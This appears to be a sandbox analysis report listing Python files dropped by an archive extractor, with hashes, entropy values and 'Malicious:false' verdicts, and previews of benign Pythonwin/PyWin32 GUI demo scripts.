                                                                                                                                                                                      SHA-512:D9702D4F855D81420B319AE1E11DEBCCFA344940F642FFA7808AF5E74336FC31E9A3892690BDC3B9386DA70BDF73D259FB703FA3E7E8AE509B19A79FBAB3C20E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2289
                                                                                                                                                                                      Entropy (8bit):4.621424310687628
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:szs/T58IAcztK4sopSDyaJNED3JAGpOremEPASzeRWGrLB2PNQMUieei2tfFHYRE:4sb58IfpK4RAyaJNkJnjUrl2PtHf4Mpn
                                                                                                                                                                                      MD5:48B4583263FD5DA31269422D35BD686B
                                                                                                                                                                                      SHA1:4B530A24EB31F9596E9270940743BAE2EE2288D3
                                                                                                                                                                                      SHA-256:EE25D0EC53230BFBC717F191530D1CEE7EC3219D2623C7372139A427F86EC6CB
                                                                                                                                                                                      SHA-512:EECA8346C3D65E5BB45B13DDCE001BA319D7EAB078F7F76E3EC767E340B93BA2A47FB6B3EB4416CA5202157B02FA3B9ECB0EDC9DDBEA43631404621F90005B44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo which creates a view and a frame which displays a PPM format bitmap.#.# This hasnnt been run in a while, as I dont have many of that format around!..import win32api.import win32con.import win32ui...class DIBView:. def __init__(self, doc, dib):. self.dib = dib. self.view = win32ui.CreateView(doc). self.width = self.height = 0. # set up message handlers. # ..self.view.OnPrepareDC = self.OnPrepareDC. self.view.HookMessage(self.OnSize, win32con.WM_SIZE).. def OnSize(self, params):. lParam = params[3]. self.width = win32api.LOWORD(lParam). self.height = win32api.HIWORD(lParam).. def OnDraw(self, ob, dc):. # set sizes used for "non strecth" mode.. self.view.SetScrollSizes(win32con.MM_TEXT, self.dib.GetSize()). dibSize = self.dib.GetSize(). dibRect = (0, 0, dibSize[0], dibSize[1]). # stretch BMP.. # self.dib.Paint(dc, (0,0,self.width, self.height),dibRect). # non s
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4574
                                                                                                                                                                                      Entropy (8bit):4.90853148325504
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:VyZpdD4ZyBMuDVv2n65x5yy04esYX1GaKJPT:84ZCM09G+iTKJPT
                                                                                                                                                                                      MD5:4A63AE2B6A65373F1092B910B69CF62C
                                                                                                                                                                                      SHA1:ABAF62EE2CBB8E0C5F420CEBB641752CFC34F3BD
                                                                                                                                                                                      SHA-256:851EC7CB72ADE79088ED54C018AD4A976AA2A82BB201CCB603C592023D529319
                                                                                                                                                                                      SHA-512:DD4408B6FC46C4C0BC02818D1E6B4BAD0CC4F8E23788B60FF82FC33F4E17143C6AF48228823570D0EC57082B7F8198F517E144700E55E5C094CBFB361D34E698
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A Demo of Pythonwin's Dialog and Property Page support...###################.#.# First demo - use the built-in to Pythonwin "Tab Stop" dialog, but.# customise it heavily..#.# ID's for the tabstop dialog - out test..#.import win32con.import win32ui.from pywin.mfc import dialog.from win32con import IDCANCEL.from win32ui import IDC_EDIT_TABS, IDC_PROMPT_TABS, IDD_SET_TABSTOPS...class TestDialog(dialog.Dialog):. def __init__(self, modal=1):. dialog.Dialog.__init__(self, IDD_SET_TABSTOPS). self.counter = 0. if modal:. self.DoModal(). else:. self.CreateWindow().. def OnInitDialog(self):. # Set the caption of the dialog itself.. self.SetWindowText("Used to be Tab Stops!"). # Get a child control, remember it, and change its text.. self.edit = self.GetDlgItem(IDC_EDIT_TABS) # the text box.. self.edit.SetWindowText("Test"). # Hook a Windows message for the dialog.. self.edit.HookMessage(se
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2829
                                                                                                                                                                                      Entropy (8bit):5.242178972131811
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fmzWPx3GuGsTqAT1hqliPcgsgjPLGq5dIOGD1w5uyrN9w3dvHqAV5xmGbz8:+zm4uGP5JqTGqF5BHqZ5xmY8
                                                                                                                                                                                      MD5:6649A11465ACC00ECBE64D50034B5281
                                                                                                                                                                                      SHA1:11490980CF7A94A268674A413406C451877E288F
                                                                                                                                                                                      SHA-256:1277E4F1754310D687BF685CA33B626E04929EFE3F354FDD9081B1EF8F7C766F
                                                                                                                                                                                      SHA-512:DDFB2DF458741CF40BF1FFA1D6572E5D7E488F16D5759003B8752B71AC2B1296F70620E9615A458D6DCC3E7C0C3EBB31E68D7C18293D2684A1B434C8804271D2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# dyndlg.py.# contributed by Curt Hagenlocher <chi@earthlink.net>..# Dialog Template params:.# .Parameter 0 - Window caption.# .Parameter 1 - Bounds (rect tuple).# .Parameter 2 - Window style.# .Parameter 3 - Extended style.# .Parameter 4 - Font tuple.# .Parameter 5 - Menu name.# .Parameter 6 - Window class.# Dialog item params:.# .Parameter 0 - Window class.# .Parameter 1 - Text.# .Parameter 2 - ID.# .Parameter 3 - Bounds.# .Parameter 4 - Style.# .Parameter 5 - Extended style.# .Parameter 6 - Extra data...import win32con.import win32ui.from pywin.mfc import dialog, window...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Select Warehouse", (0, 0, 177, 93), style, None, (8, "MS Sans Serif")],. ]. dlg.append([130, "Current Warehouse:", -1,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2759
                                                                                                                                                                                      Entropy (8bit):4.974631778635262
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:74tR9wr5J+Vs3x95vgQppI4OyaL/1I4t7T/tcD+jHgMzC:MR9mc2XZ1pIFtDy4pT/tzjHVzC
                                                                                                                                                                                      MD5:EC4DFE4E14541E236CB0ED2C6EF45C45
                                                                                                                                                                                      SHA1:527BCD37188373C6C903B532A9E2B94D4738799E
                                                                                                                                                                                      SHA-256:566ED0C5460B8591E49788F20E60F716F6BDE99F497DAF9CB8A172C101D1C586
                                                                                                                                                                                      SHA-512:4F5125D4C755C725FA448369E1EA5DF0444D527B03A39E140E7EE6184AF8EAC7AC5920DDF794A0C1AD14FD0ABB9F2DC6117D03234A8F8D54C559832B751E48EB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Demo of Generic document windows, DC, and Font usage.# by Dave Brennan (brennan@hal.com)..# usage examples:..# >>> from fontdemo import *.# >>> d = FontDemo('Hello, Python').# >>> f1 = { 'name':'Arial', 'height':36, 'weight':win32con.FW_BOLD}.# >>> d.SetFont(f1).# >>> f2 = {'name':'Courier New', 'height':24, 'italic':1}.# >>> d.SetFont (f2)..import win32api.import win32con.import win32ui.from pywin.mfc import docview..# font is a dictionary in which the following elements matter:.# (the best matching font to supplied parameters is returned).# name..string name of the font as known by Windows.# size..point size of font in logical units.# weight..weight of font (win32con.FW_NORMAL, win32con.FW_BOLD).# italic..boolean; true if set to anything but None.# underline.boolean; true if set to anything but None...class FontView(docview.ScrollView):. def __init__(. self, doc, text="Python Rules!", font_spec={"name": "Arial", "height": 42}. ):. docview.ScrollView.__
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2709
                                                                                                                                                                                      Entropy (8bit):4.491038307415068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:0kg2g3zeqdFSLlcMGfmTeg24Kjvx3RRV6Wwn:hgfRcca92PvxbVwn
                                                                                                                                                                                      MD5:52EA743C9A5F7CFCC05CF59610DF6422
                                                                                                                                                                                      SHA1:83D3CB7B21E5B5C07B24A947F53240A42A9529BF
                                                                                                                                                                                      SHA-256:23AE39A4E5BE89FA81F2DF290AC79BF83C4A2D24026D81EDCCBB3474E5E3EE71
                                                                                                                                                                                      SHA-512:44CE3E58DF0A4395C6359176EFBE8D731D64DD6EA55442B443FEF270EB5DD03860A661EA664CC4C4907447C365363E47375EDCF9AB0967F398AF9FC42F96E331
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# GUI Demo - just a worker script to invoke all the other demo/test scripts..import sys..import __main__.import regutil.import win32api.import win32ui..demos = [ # .('Font', 'import fontdemo;fontdemo.FontDemo()'),. ("Open GL Demo", "import openGLDemo;openGLDemo.test()"),. ("Threaded GUI", "import threadedgui;threadedgui.ThreadedDemo()"),. ("Tree View Demo", "import hiertest;hiertest.demoboth()"),. ("3-Way Splitter Window", "import splittst;splittst.demo()"),. ("Custom Toolbars and Tooltips", "import toolbar;toolbar.test()"),. ("Progress Bar", "import progressbar;progressbar.demo()"),. ("Slider Control", "import sliderdemo;sliderdemo.demo()"),. ("Dynamic window creation", "import createwin;createwin.demo()"),. ("Various Dialog demos", "import dlgtest;dlgtest.demo()"),. ("OCX Control Demo", "from ocx import ocxtest;ocxtest.demo()"),. ("OCX Serial Port Demo", "from ocx import ocxserialtest;.ocxserialtest.test()"),. (. "IE4 Control Demo",.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3766
                                                                                                                                                                                      Entropy (8bit):4.7759365871499115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:tAvEDSXSimgEb36/O2W9NebOVQOVDsEuExIczHUQ:tWE7/mJWreyNdxf0Q
                                                                                                                                                                                      MD5:27345B318FAE042B9638336FAB47DC65
                                                                                                                                                                                      SHA1:ACEB5D20D5E013458366D1EFF0BEFC25E6DF3E0E
                                                                                                                                                                                      SHA-256:5002F752137A85F1EAD040A6B763F6B1B18D159E19CDF618CAEC411D1DA2D6C0
                                                                                                                                                                                      SHA-512:7D6198D2D03764F3C12CE796DB74532B0930107409E832879AD20F9765334BFF34CD20E6DF34C8BB69348648476436AE1660F699D97890FA3C23FC4011849C63
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import commctrl.import win32ui.from pywin.mfc import docview, window.from pywin.tools import hierlist...# directory listbox.# This has obvious limitations - doesnt track subdirs, etc. Demonstrates.# simple use of Python code for querying the tree as needed..# Only use strings, and lists of strings (from curdir()).class DirHierList(hierlist.HierList):. def __init__(self, root, listBoxID=win32ui.IDC_LIST1):. hierlist.HierList.__init__(self, root, win32ui.IDB_HIERFOLDERS, listBoxID).. def GetText(self, item):. return os.path.basename(item).. def GetSubList(self, item):. if os.path.isdir(item):. ret = [os.path.join(item, fname) for fname in os.listdir(item)]. else:. ret = None. return ret.. # if the item is a dir, it is expandable.. def IsExpandable(self, item):. return os.path.isdir(item).. def GetSelectedBitmapColumn(self, item):. return self.GetBitmapColumn(item) + 6 # Use different col
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):490
                                                                                                                                                                                      Entropy (8bit):4.790457084981066
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:Sq3VGrAF3xMjLmJVwUXYQ3EAjpAeoQbk/AIL/hXwlfNI6lmH4yHFS31l0rcb5b+1:JUk4LmbLU2pJxIIIThPGo41ldx+1
                                                                                                                                                                                      MD5:B85C91F60CCD40AFA34E217F6C730DEB
                                                                                                                                                                                      SHA1:4254190DC95206CD2DE7DC75E0A11844D623B862
                                                                                                                                                                                      SHA-256:9B32896D9931F16907578519A48A5172BA8F257D64F65C41C327ACF1948DB1D8
                                                                                                                                                                                      SHA-512:7EDA504EFF850B8784A862353532F8DEAFFBE742DE7840C55600561C907202300237702217840CB8E3D381FAFC19A791960B37213942413BDF34A4CDD05DD93F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Run this as a python script, to gray "close" off the edit window system menu..import win32con.from pywin.framework import interact..if __name__ == "__main__":. import demoutils.. if demoutils.NeedGoodGUI():. win = interact.edit.currentView.GetParent(). menu = win.GetSystemMenu(). id = menu.GetMenuItemID(6). menu.EnableMenuItem(id, win32con.MF_BYCOMMAND | win32con.MF_GRAYED). print("The interactive window's 'Close' menu item is now disabled.").
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                                      Entropy (8bit):4.598187757077594
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:qGpxE2ahvgtBXKTAESwAHplowG/hfMLy+FLjbABS/AYmXDf8b0zaFlBpJn:Rpxba0KTMwIpvG/9+tjbv/1qmFlB/n
                                                                                                                                                                                      MD5:9EF7E46AFDD9638F0B839B9A5CB199D4
                                                                                                                                                                                      SHA1:D0E85A815263617BDDB74084BDAD38D8B36153C0
                                                                                                                                                                                      SHA-256:BE40CA9EB9BFDDF7D3B6B506E8E11E22746BC9A970ED1705B873F871968CBCBC
                                                                                                                                                                                      SHA-512:9F377F2ECB233A826EECC7008848C7AD4BA2A171A57E33F85F002D8E2EC65A8111F35B8A68E7CE2333A7AB7D59B2975042203980602BF936AA034F8A19493878
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a sample file, and shows the basic framework for using an "Object" based.# document, rather than a "filename" based document..# This is referenced by the Pythonwin .html documentation...# In the example below, the OpenObject() method is used instead of OpenDocumentFile,.# and all the core MFC document open functionality is retained...import win32ui.from pywin.mfc import docview...class object_template(docview.DocTemplate):. def __init__(self):. docview.DocTemplate.__init__(self, None, None, None, object_view).. def OpenObject(self, object): # Use this instead of OpenDocumentFile.. # Look for existing open document. for doc in self.GetDocumentList():. print("document is ", doc). if doc.object is object:. doc.GetFirstView().ActivateFrame(). return doc. # not found - new one.. doc = object_document(self, object). frame = self.CreateNewFrame(doc). doc.OnNewDocument().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1501
                                                                                                                                                                                      Entropy (8bit):4.880256056364068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpb:zg7RHNYacPSia0LcbsoYY1Amt
                                                                                                                                                                                      MD5:EA40A2E7FA0D59B4FBA8E17624001F16
                                                                                                                                                                                      SHA1:4AB2487C5DE2CF2787F744CBF43B6679F008AFDF
                                                                                                                                                                                      SHA-256:98C8D8EFCA13834E1C7288BE825DBFB5165E0D00BDD25E22123147ED63A757E8
                                                                                                                                                                                      SHA-512:C2B9FC28E717FE17A5F99B2B78AFB2B4489A76F964F984C35227D4A25927660D5140333E5C4AEAA201074B45FC2A4A64C036340394E64C5F7ADBCCECF52CFAB9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3019
                                                                                                                                                                                      Entropy (8bit):4.928109370801704
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:EI3lvFKgppcWFkRC2Y5icp7SBpsHOPQoOL4w1YzBBgVCi6jgIPOUhVA5Os+YpsuW:EMsgpPx5Rp7ypUOIzLNaVs76jgI2J5OT
                                                                                                                                                                                      MD5:8EB47FD8B69A81F278B4ABE11DC245FD
                                                                                                                                                                                      SHA1:72E0F17EE9D8AE16D436E26459F4743B0CB28D96
                                                                                                                                                                                      SHA-256:46B673EBB38C49A54880E80C2393A8CDC1E624876DF3BE579ACF50695A68B62D
                                                                                                                                                                                      SHA-512:C38B67626D233229A089F1FB1DF0F25882173D59637D3151CC6143DBD41E454BC5A35A52664E64B0FF40DF538E88E5C9D3D57E5F60FF2662A4A5F99BEC1CA142
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# By Bradley Schatz.# simple flash/python application demonstrating bidirectional.# communicaion between flash and python. Click the sphere to see.# behavior. Uses Bounce.swf from FlashBounce.zip, available from.# http://pages.cpsc.ucalgary.ca/~saul/vb_examples/tutorial12/..# Update to the path of the .swf file (note it could be a true URL).flash_url = "c:\\bounce.swf"..import sys..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import activex, window.from win32com.client import gencache..FlashModule = gencache.EnsureModule("{D27CDB6B-AE6D-11CF-96B8-444553540000}", 0, 1, 0)..if FlashModule is None:. raise ImportError("Flash does not appear to be installed.")...class MyFlashComponent(activex.Control, FlashModule.ShockwaveFlash):. def __init__(self):. activex.Control.__init__(self). FlashModule.ShockwaveFlash.__init__(self). self.x = 50. self.y = 50. self.angle = 30. self.started = 0.. def OnFSCommand(self, c
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5048
                                                                                                                                                                                      Entropy (8bit):4.781620280031484
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:i6/+MX858voTQg3Uzk29LYWu2VuiAKMebC6IzKHc5Yp1PIEsuI:JA5QHhYWu+A2Cxip5IoI
                                                                                                                                                                                      MD5:4374102AE9A00E5C51450DF55F17BD17
                                                                                                                                                                                      SHA1:19B9B8347066EB7F01194EE7FB2EBF700BCD0762
                                                                                                                                                                                      SHA-256:A23CF5E8F0DAE332035DD1081B32A7DDBC0BD697DB1A68EDAB52B0FAC25B3BF7
                                                                                                                                                                                      SHA-512:03CF3052789CA0A6BC05C8B02950A2B0EE4B0EB1EFE599D4008DF6BE1C502A6E79F8A57F9ECE082685310914F863F8A1204443276E1120BA9A9A48421DDEFA68
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This demo uses some of the Microsoft Office components..#.# It was taken from an MSDN article showing how to embed excel..# It is not comlpete yet, but it _does_ show an Excel spreadsheet in a frame!.#..import regutil.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, docview, object, window.from win32com.client import gencache..# WordModule = gencache.EnsureModule('{00020905-0000-0000-C000-000000000046}', 1033, 8, 0).# if WordModule is None:.# .raise ImportError, "Microsoft Word version 8 does not appear to be installed."...class OleClientItem(object.CmdTarget):. def __init__(self, doc):. object.CmdTarget.__init__(self, win32uiole.CreateOleClientItem(doc)).. def OnGetItemPosition(self):. # For now return a hard-coded rect.. return (10, 10, 210, 210).. def OnActivate(self):. # Allow only one inplace activate item per frame. view = self.GetActiveView(). item = self.GetDocument().GetInPlaceActiveItem(view).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3611
                                                                                                                                                                                      Entropy (8bit):4.749470057382686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:JG/qBKrkDETqAT1hqmiaLvXWNKcqMjpoKFuKbpIV7UC/RpIiC5KHrZN/UZ/CH7u:w/XqEnv6KxS/FuKbpAUNKVNs/CHS
                                                                                                                                                                                      MD5:08EC418B44BDC4D47C8EBEF15421B891
                                                                                                                                                                                      SHA1:088CCBD0F7EC44ABF192129F3864ADBE41C35B63
                                                                                                                                                                                      SHA-256:694A4B0C8CC306559242C2973FFF638AFC13848E9AB49C6D213581010EDC5591
                                                                                                                                                                                      SHA-512:4F26F2F8C3FCFE4A1D7FDC0CF60D319E7590D8993CCF37FBFE755D7E37CE779453A6341E30AF7BEA6924634232269CBA792A248536988E8A82CDDFC82CB483CD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ocxserialtest.py.#.# Sample that uses the mscomm OCX to talk to a serial.# device...# Very simple - queries a modem for ATI responses..import pythoncom.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog.from win32com.client import gencache..SERIAL_SETTINGS = "19200,n,8,1".SERIAL_PORT = 2..win32ui.DoWaitCursor(1).serialModule = gencache.EnsureModule("{648A5603-2C6E-101B-82B6-000000000014}", 0, 1, 1).win32ui.DoWaitCursor(0).if serialModule is None:. raise ImportError("MS COMM Control does not appear to be installed on the PC")...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Very Basic Terminal", (0, 0, 350, 180), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. dlg.append(.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6805
                                                                                                                                                                                      Entropy (8bit):4.779699424357507
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:85MiGinGqzC9//qIV4dKwvwjZUMIv3KISiKyvb6gJ5c5YpL14gDY/kT:8SilkAIjZMvhDyipJ4gDY/kT
                                                                                                                                                                                      MD5:455C39408751DF999C31ED6F3FE9F254
                                                                                                                                                                                      SHA1:7F6508DE9C98BC42B98ACB16E0AB22205A4092ED
                                                                                                                                                                                      SHA-256:C8029BF8681AF4253E8438B6BAC35C4882E38613CA0540AF64CF47B532F55A94
                                                                                                                                                                                      SHA-512:97A4F7543C23C8907347360B8598E866935B8D3287FFF12BFEDBF86B786704DE1B72259DAD85037D41E4F1DCE84CEB8B0C45F12A322A0723E9756B89F4A2CBDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# OCX Tester for Pythonwin.#.# This file _is_ ready to run. All that is required is that the OCXs being tested.# are installed on your machine..#.# The .py files behind the OCXs will be automatically generated and imported...import glob.import os..import win32api.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog, window.from win32com.client import gencache...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["OCX Demos", (0, 0, 350, 350), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. # .dlg.append([131, None, 130, (5, 40, 110, 48),. # ..s | win32con.LBS_NOTIFY | win32con.LBS_SORT | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL | win32con.WS_BORDER]). # .dlg.append(["{
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3160
                                                                                                                                                                                      Entropy (8bit):4.508513007580098
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kb4rODdJujfsRxdCEY0P+Vj8u8x4TMyRlSiRlb9YHtGDWcXGZya5mx+Jj:kbCeujfsRxdCEY0PW8uK4T/RlSiRlb9I
                                                                                                                                                                                      MD5:41C91B0140813BC8CC87C26CF7DD98BD
                                                                                                                                                                                      SHA1:6E7F6FF9B6802ADAE1DB64823F8C9CD46B92302D
                                                                                                                                                                                      SHA-256:E4CC4A2BE360D6CA1A2BF73A7C52210BE5FCFE15AF1381FB2347C8E66A2A71B0
                                                                                                                                                                                      SHA-512:26B4ADEA5C66DE0AFBEC831189A8EED366E1F3CFB4E01BA9CA50F37DD32C4B7A362A80943BADD67F7CFBC6542AA2B9B3B00002EB727AC54DCC1F31F986243470
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sys...# Some cruft to deal with the Pythonwin GUI booting up from a non GUI app..def _MakeDebuggerGUI():. app.InitInstance()...isInprocApp = -1...def _CheckNeedGUI():. global isInprocApp. if isInprocApp == -1:. import win32ui.. isInprocApp = win32ui.GetApp().IsInproc(). if isInprocApp:. # MAY Need it - may already have one. need = "pywin.framework.app" not in sys.modules. else:. need = 0. if need:. import pywin.framework.app.. from . import dbgpyapp.. pywin.framework.app.CreateDefaultGUI(dbgpyapp.DebuggerPythonApp).. else:. # Check we have the appropriate editor. # No longer necessary!. pass. return need...# Inject some methods in the top level name-space..currentDebugger = None # Wipe out any old one on reload....def _GetCurrentDebugger():. global currentDebugger. if currentDebugger is None:. _CheckNeedGUI(). from . import debugger.. currentDebugger =
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1183
                                                                                                                                                                                      Entropy (8bit):4.732521227343416
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:btWt6PTAxA5/Hpnz2AwEHAhryUHbAdPevN7ylHS9ei2:Y6PTwmnz2Aw6AhryUskl7iHS9ei2
                                                                                                                                                                                      MD5:9F30DCEE5A9761D1972B9F613F932C50
                                                                                                                                                                                      SHA1:AABB67A2926A7091D4ECCF9AFB3FADB50A8B690B
